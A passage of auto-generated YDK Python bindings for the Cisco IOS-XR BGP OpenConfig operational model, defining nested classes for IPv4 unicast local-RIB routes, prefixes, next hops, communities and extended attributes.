self.loc_rib = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib()
self.loc_rib.parent = self
self._children_name_map["loc_rib"] = "loc-rib"
self.open_config_neighbors = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors()
self.open_config_neighbors.parent = self
self._children_name_map["open_config_neighbors"] = "open-config-neighbors"
self._segment_path = lambda: "ipv4-unicast"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast, [], name, value)
class LocRib(_Entity_):
"""
Local rib route table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib, self).__init__()
self.yang_name = "loc-rib"
self.yang_parent_name = "ipv4-unicast"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.NumRoutes))])
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "loc-rib"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "loc-rib"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route))])
self._leafs = OrderedDict()
self.route = YList(self)
self._segment_path = lambda: "routes"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastUpdateRecieved))])
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
"""
Prefix
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "prefix-name"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "prefix"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/prefix-name/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.Community))])
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
self.local_pref = None
self.atomic_aggr = None
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
"""
NextHopAddress
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/route-attr-list/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
"""
AggregatorList
.. attribute:: as_
AS number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: as4
AS4 number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
self.yang_name = "aggregrator-attributes"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
])
self.as_ = None
self.as4 = None
self.address = None
self._segment_path = lambda: "aggregrator-attributes"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/route-attr-list/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
"""
CommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.Community, self).__init__()
self.yang_name = "community"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "community"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/route-attr-list/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes))])
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/ext-attributes-list/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
